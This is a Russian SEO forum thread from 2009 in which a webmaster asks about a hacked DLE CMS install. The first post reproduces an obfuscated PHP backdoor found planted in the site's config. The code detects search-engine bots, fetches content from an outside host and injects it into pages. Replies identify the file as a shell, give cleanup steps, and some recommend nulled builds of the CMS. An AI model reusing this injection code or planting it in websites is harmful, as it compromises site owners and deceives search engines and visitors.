Взламывают Dle - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

3 страниц

1 2 3 >

Взламывают Dle

Опции

Turbo_Pie

Topic Starter сообщение

23.12.2009, 2:47; Ответить: Turbo_Pie

Сообщение #1

Участник

Группа: User
Сообщений: 103
Регистрация: 3.1.2008
Поблагодарили: 10 раз
Репутация:

Всем привет. суть в чем: постоянно взламывают DLE и меняют пароль в админку. Сегодня обнаружил в папке /engine/data/ посторонний файл conect.php и его include в dbconfig.php

В файле conect.php было: (именно с одной n)

<?php $x12="f\151le"; $x13="\x66\x73o\143\153\x6f\x70en"; $x14="\151\155\x70\154\x6fd\x65"; $x15="s\164rp\157\x73";
if($_GET['chek']){echo"\074\x21--\103\x48E\x43\x4b\x312\x33\x312\071\x33\x3712\06387\0621\063\x2d\x2d>";} $x0b = array(); $x0b['ad_Robots_UserAgent']=array('Google','Googlebot','msnbot','Yandex','YaDirectBot');
$x0b['ad_IsRobot']=false; foreach ($x0b['ad_Robots_UserAgent'] as $x0c){if ($x15($_SERVER['HTTP_USER_AGENT'], $x0c)!==false){ $x0b['ad_IsRobot']=true; break;} } $x0d = ''; if($x0b['ad_IsRobot'])
{ $x0d = @$x13("\166\151p\055ba\x73\145\x2e\x77\163", 80, $x0e, $x0f, 8);if(!$x0d){echo "";}
else{ $x10 = @$x12("h\164\x74\160\072\x2f\057vip\055\142ase\x2e\167\x73/\171\141\x6e\144\x65\x78\x2fs\x63a\x6e\056\x70\x68p?ho\x73\x74=$_SERVER[SERVER_NAME]\x26\151\x70\075$_SERVER[REMOTE_ADDR]"); if($x10==true) echo $x14('',$x10); } }
unset($x0b,$x0c,$x11,$x0d); return $x0d;?>

Кто может объяснить, что здесь такое понаписали? Спасибо за информацию!

--------------------

[img]http://www.binimage.de/imgs/ru/468_1_ru.gif[/img]

Ответить с цитированием данного сообщения

Frankie Frankie 23.12.2009, 3:13; Сообщений: 1562 Поблагодарили: 326 раз Репутация: 38 Просмотр профиля	23.12.2009, 3:13; Ответить: Frankie Сообщение #2
Старожил Группа: Active User Сообщений: 1562 Регистрация: 18.9.2009 Поблагодарили: 326 раз Репутация: 38	версия двига 8.2? Если да, то вам сюда: http://talk.maulnet.ru/topic39018.html Так же совет от меня лично, через эту дыру получают пароль юзера ID1, создайте себе нового юзера, дайте ему админские права, а c юзера ID1 наоборот все права снимите, так, даже если ID1 опять взломают, то вам ничего не грозит Сообщение отредактировал Frankie - 23.12.2009, 3:14

Turbo_Pie Topic Starter Turbo_PieTopic Starter 23.12.2009, 3:15; Сообщений: 103 Поблагодарили: 10 раз Репутация: 1 Просмотр профиля	Topic Starter 23.12.2009, 3:15; Ответить: Turbo_Pie Сообщение #3
Участник Группа: User Сообщений: 103 Регистрация: 3.1.2008 Поблагодарили: 10 раз Репутация: 1	У меня сетка сателлитов. Там 8.2 и 8.0. и все взламывали. 8.3 тоже недавно начал ставить, там пароли не поменяли, а вот этот файл сунули... Файл менял на 8.2 ... Фтп доступ вообще закрыт. Через FTP клиенты зайти нельзя. Сообщение отредактировал Turbo_Pie - 23.12.2009, 3:18 -------------------- [img]http://www.binimage.de/imgs/ru/468_1_ru.gif[/img]

saneck08 saneck08 23.12.2009, 3:18; Сообщений: 183 Поблагодарили: 32 раза Репутация: -13 Просмотр профиля	23.12.2009, 3:18; Ответить: saneck08 Сообщение #4
Участник Группа: User Сообщений: 183 Регистрация: 26.12.2008 Поблагодарили: 32 раза Репутация: -13	(Turbo_Pie @ 23.12.2009, 2:15) У меня сетка сателлитов. Там 8.2 и 8.0. и все взламывали. 8.3 тоже недавно начал ставить, там пароли не поменяли, а вот этот файл сунули... проверь права на папки. мня тоже с версией 8.2 взламывали, пока нулл в паблик не пустили на версию 8.3 ...

Turbo_Pie Topic Starter Turbo_PieTopic Starter 23.12.2009, 3:20; Сообщений: 103 Поблагодарили: 10 раз Репутация: 1 Просмотр профиля	Topic Starter 23.12.2009, 3:20; Ответить: Turbo_Pie Сообщение #5
Участник Группа: User Сообщений: 103 Регистрация: 3.1.2008 Поблагодарили: 10 раз Репутация: 1	(saneck08 @ 23.12.2009, 2:18) проверь права на папки. мня тоже с версией 8.2 взламывали, пока нулл в паблик не пустили на версию 8.3 ... Проверял, вроде нормально... -------------------- [img]http://www.binimage.de/imgs/ru/468_1_ru.gif[/img]

life life 23.12.2009, 4:42; Сообщений: 921 Поблагодарили: 148 раз Репутация: -4 Просмотр профиля	23.12.2009, 4:42; Ответить: life Сообщение #6
Завсегдатай Группа: Active User Сообщений: 921 Регистрация: 28.1.2009 Поблагодарили: 148 раз Репутация: -4	это шелл. выполняется conect.php , и (вероятно!!) меняет пароль админа (может быть скуль запрсом, может ещё чем). решается просто: удаляйте коннект.пхп , сносите инклуд, меняйте пароль на фтп, меняйте пароль админа, ставите заплатку для 8.2 (если 8.2, и если не стоит), проверяете каждую папку, на инородные файлы (проще из админки антивирусом), могут быть ещё такие шеллы. Удачи. Сообщение отредактировал life - 23.12.2009, 4:46

Frankie Frankie 23.12.2009, 12:13; Сообщений: 1562 Поблагодарили: 326 раз Репутация: 38 Просмотр профиля	23.12.2009, 12:13; Ответить: Frankie Сообщение #7
Старожил Группа: Active User Сообщений: 1562 Регистрация: 18.9.2009 Поблагодарили: 326 раз Репутация: 38	а еще смените двиг на нуллед от мид-тима, остальные сборки выкиньте, они все кривые и дырявые

centurion centurion 23.12.2009, 12:15; Сообщений: 2831 Поблагодарили: 1349 раз Репутация: 308 Просмотр профиля	23.12.2009, 12:15; Ответить: centurion Сообщение #8
Топовый постер Группа: Active User Сообщений: 2831 Регистрация: 10.12.2007 Из: aceweb Поблагодарили: 1349 раз Репутация: 308	В топку такой двиг или версию. Мало того что парсится контент с движка фришными граберами, так еще и ломают на раз, два, три. Зачем на нем сайты-то ставить? Сообщение отредактировал centurion - 23.12.2009, 12:18

demon932008 demon932008 23.12.2009, 12:47; Сообщений: 4365 Поблагодарили: 1140 раз Репутация: 174 Просмотр профиля	23.12.2009, 12:47; Ответить: demon932008 Сообщение #9
Пишу тексты :) Группа: Active User Сообщений: 4365 Регистрация: 4.12.2008 Из: Украина Поблагодарили: 1140 раз Репутация: 174	centurion, вордпресс не лучше -------------------- Услуги рерайтинга и копирайтинга. Отзывы, контакты и цены в теме

coolurik coolurik 23.12.2009, 13:46; Сообщений: 3164 Поблагодарили: 1332 раза Репутация: 183 Просмотр профиля	23.12.2009, 13:46; Ответить: coolurik Сообщение #10
Топовый постер Группа: Active User Сообщений: 3164 Регистрация: 15.7.2008 Поблагодарили: 1332 раза Репутация: 183	centurion, версия 8.2 наверняка, просто обновить нужно вовремя было.

« Предыдущая тема · Программная часть · Следующая тема »

3 страниц

1 2 3 >

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
DLE xProtect	2	xoopw	5977	15.1.2024, 21:06 автор: Diana_Wesley
Обновить сайт на CMS DLE	1	Sawich	1661	2.9.2023, 10:10 автор: WoWeb
Изготовление красивых сайтов на DLE под ключ \| Доступные цены от 2000 руб.	1	Admiral_ukr	1598	20.11.2022, 10:08 автор: Webmaster24
Ищу спеца по DLE вылечить сайт	4	Reactive	2639	22.10.2022, 9:01 автор: Fozik77
требуется перенос с Dle на wordpres нужен человек для переноса движка	5	Юрий82	1943	30.7.2022, 18:02 автор: Klerik84

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 19.4.2024, 0:32

Дизайн